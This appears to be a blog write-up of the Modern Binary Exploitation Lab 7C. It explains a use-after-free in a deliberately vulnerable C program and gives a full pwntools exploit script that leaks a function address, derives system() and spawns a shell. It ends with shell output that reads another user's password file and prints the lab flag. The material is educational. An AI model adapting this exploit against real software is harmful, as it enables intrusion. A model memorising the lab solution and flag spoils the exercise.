---
layout: post
title: Modern Binary Exploitation - Lab 7C
published: True
---

For this lab, we are given a program and its corresponding source code:

{% highlight C %}
/* compiled with: gcc -z relro -z now -fPIE -pie -fstack-protector-all -o lab7C lab7C.c */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include "utils.h"

#define MAX_STR 6
#define MAX_NUM 6

struct data {
    char reserved[8];
    char buffer[20];
    void (* print)(char *);
};

struct number {
    unsigned int reserved[6];               // implement later
    void (* print)(unsigned int);
    unsigned int num;
};

void small_str(char * a_str)
{
    printf("here's your lame string: %s\n", a_str);
}

void big_str(char * a_str)
{
    printf("nice big str yo: %s\n", a_str);
}

void small_num(unsigned int a_num)
{
    printf("not 1337 enough: %u\n", a_num);
}

void big_num(unsigned int a_num)
{
    printf("tite number dawg: %u\n", a_num);
}

void print_menu()
{
    printf("-- UAF Playground Menu ----------------------\n"
           "1. Make a string\n"
           "2. Make a number\n"
           "3. Delete a string\n"
           "4. Delete a number\n"
           "5. Print a string\n"
           "6. Print a number\n"
           "7. Quit\n"
           "---------------------------------------------\n"
           "Enter Choice: ");
}

/* bugs galore... but no memory corruption! */
int main(int argc, char * argv[])
{
    struct data * strings[MAX_STR] = {0};
    struct number * numbers[MAX_NUM] = {0};
    struct data * tempstr = NULL;
    struct number * tempnum = NULL;

    int strcnt = 0;
    int numcnt = 0;
    unsigned int choice = 0;
    unsigned int index = 0;

    while(1)
    {
        print_menu();

        /* get menu option */
        if((choice = get_unum()) == EOF)
            break;

        /* make a string */
        if(choice == 1)
        {
            if(strcnt < MAX_STR)
            {
                tempstr = malloc(sizeof(struct data));

                /* no memory corruption this time */
                printf("Input string to store: ");
                fgets(tempstr->buffer, 20, stdin);
                tempstr->buffer[strcspn(tempstr->buffer, "\n")] = 0;

                /* pick a print function */
                tempstr->print = strlen(tempstr->buffer) > 10 ? big_str : small_str;

                /* store the string to our master list */
                strings[++strcnt] = tempstr;
                printf("Created new string!\n");
            }
            else
                printf("Please delete a string before trying to make another!\n");
        }

        /* make a number */
        else if(choice == 2)
        {
            if(numcnt < MAX_NUM)
            {
                tempnum = malloc(sizeof(struct number));

                printf("Input number to store: ");
                tempnum->num = get_unum();

                /* pick a print function */
                tempnum->print = tempnum->num > 0x31337 ? big_num : small_num;

                /* store the number to our master list */
                numbers[++numcnt] = tempnum;
                printf("Created new number!\n");
            }
            else
                printf("Please delete a number before trying to make another!\n");
        }

        /* delete a string */
        else if(choice == 3)
        {
            if(strcnt && strings[strcnt])
            {
                free(strings[strcnt--]);
                printf("Deleted most recent string!\n");
            }
            else
                printf("There are no strings left to delete!\n");
        }

        /* delete a number */
        else if(choice == 4)
        {
            if(numcnt && numbers[numcnt])
            {
                free(numbers[numcnt--]);
                printf("Deleted most recent number!\n");
            }
            else
                printf("There are no numbers left to delete!\n");
        }

        /* print a string */
        else if(choice == 5)
        {
            printf("String index to print: ");
            index = get_unum();

            if(index < MAX_STR && strings[index])
                strings[index]->print(strings[index]->buffer);
            else
                printf("There is no string to print!\n");
        }

        /* print a number */
        else if(choice == 6)
        {
            printf("Number index to print: ");
            index = get_unum();

            if(index < MAX_NUM && numbers[index])
                numbers[index]->print(numbers[index]->num);
            else
                printf("There is no number to print!\n");
        }

        /* quit */
        else if(choice == 7)
            break;

        /* base case */
        else
            printf("Invalid choice!\n");

        index = 0;
        choice = 0;
        printf("\n");
    }

    printf("See you tomorrow!\n");
    return EXIT_SUCCESS;
}
{% endhighlight %}

If we run `checksec`, we can see that NX, PIE and full RELRO are enabled.
{% highlight bash%}
lab7C@warzone:/levels/lab07$ checksec lab7C
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	FORTIFY	FORTIFIED FORTIFY-able  FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   Yes	0		4	lab7C
{% endhighlight %}

The program creates a `strings[]` array of 6 pointers to data structs.  
Each element in the `strings[]` array is a pointer to a data struct.
Similarly, an array of 6 pointers to number structs is created called `numbers[]`.

If we examine each struct definition, we notice that they are both 32-bytes large. (chars each take up 1 byte, unsigned ints each take up 4 bytes)

{%highlight C%}
struct data {
    char reserved[8];
    char buffer[20];
    void (* print)(char *);
};

struct number {
    unsigned int reserved[6];               // implement later
    void (* print)(unsigned int);
    unsigned int num;
};
{% endhighlight %}

This is interesting because this means that **the memory allocater will likely reallocate chunks for number structs from freed data structs and vice-a-versa.**
This kind of condition is usually a precursor to use-after-free scenarios, in which an object is freed and then a different type of object is allocated over it, but a reference to the original object still exists.

In order to defeat ASLR, we need to look for an infoleak that we can use.
 
## Infoleak
We can get an infoleak if we allocate a number struct, free it, allocate a data struct over it with a small string, and print the freed number.
The number that is printed out should be the address  stored in the `data` struct's `void (* print)(char *);` member, which, because we used a small string, should be the address of `small_str()`. 

{% highlight bash  %}
gdb-peda$ x/32x 0xb93da008
0xb93da008:	0x00000000	0x00000000	0x42424242	0x00000000
0xb93da018:	0x00000000	0x00000000	0xb77e3c65	0xb77e3bc7
0xb93da028:	0x00000000	0x00020fd9	0x00000000	0x00000000
{% endhighlight %}
^ `0xb93da018` holds the address of `small_str()`, which the `number` struct thinks is its `num` member!

With the address of this function in the .text section, we can use a known offset to calculate the address of `system()` in libc. (***Note: This is actually a flaw with Ubuntu. When PIE is enabled, the distance between the base address of the ELF executable and the base address of libc should change with each run. However, Ubuntu's ASLR sucks which allows us to calculate the base address of libc from just the base address of the ELF executable***)  


## EIP Control

Once we've leaked the address of `system()`, we need to call it while passing in `/bin/sh` as its argument. We can do this by again taking advantage of the use-after-free vulnerability.

To recap, so far we have a `data` chunk sitting on top of what used to be a `number` chunk. From here, in order to get code execution, we can overwrite this `data` chunk's `void (* print)(char *);` member by freeing it, allocating a `number` chunk over it using the address of `system()` as the number, and then printing the now free'd but still in-use `data` chunk.

Of course, in order for us to get a shell, we will need to have passed in `/bin/sh` as the string for this `data` struct from the first time it is allocated. We can redo this step if necessary in order to call `system("/bin/sh")` and spawn a shell.

Putting everything together, the following exploit will grant us a shell.

## Solution
{% highlight python %}
#!/usr/bin/env python

from pwn import *
import sys
from struct import pack

def exploit(r):
  ## Infoleak ##
  r.recvuntil("Choice:")
  r.sendline("2")
  r.recvuntil(": ")
  r.sendline("10") 
  r.recvuntil(": ")
  r.sendline("4") 
  r.recvuntil(": ")
  r.sendline("1")
  r.sendline("/bin/sh")
  r.recvuntil(": ")
  r.sendline("6")
  r.recvuntil(": ")
  r.sendline("1")
  log.info("Leaking addresses...")
  small_str = int(r.recvuntil("\n").split(": ")[2])
  log.success("Small_str() @ " + hex(small_str))
  system = small_str-0x19da37
  log.success("System() @ "+hex(system))
  r.recvuntil(": ")
  
  ## EIP control ##
  r.sendline("3")
  r.recvuntil(": ")
  r.sendline("2")
  r.recvuntil(": ")
  #r.sendline("2953575118")
  r.sendline(str(system))
  r.recvuntil(": ")
  r.sendline("5")
  r.recvuntil(": ")
  r.sendline("1")

  log.success('Enjoy your shell...')  
  r.interactive()
if __name__ == "__main__":
  log.info("For remote: %s HOST PORT" % sys.argv[0])
  if len(sys.argv) > 1:
    r = remote(sys.argv[1], int(sys.argv[2]))
    exploit(r)
  else:
    r = process(['/levels/lab07/lab7C'])
    print util.proc.pidof(r)
    pause()
    exploit(r)
{% endhighlight %}

{% highlight bash %}
lab7C@warzone:/tmp/lab7C$ python solve.py 
[*] For remote: solve.py HOST PORT
[+] Starting program '/levels/lab07/lab7C': Done
[5648]
[*] Paused (press any to continue)
[*] Leaking addresses...
[+] Small_str() @ 0xb7755bc7
[+] System() @ 0xb75b8190
[+] Enjoy your shell...
[*] Switching to interactive mode
$ id
uid=1026(lab7C) gid=1027(lab7C) euid=1027(lab7A) groups=1028(lab7A),1001(gameuser),1027(lab7C)
$ cat /home/lab7A/.pass
us3_4ft3r_fr33s_4re_s1ck
$  
{% endhighlight %}

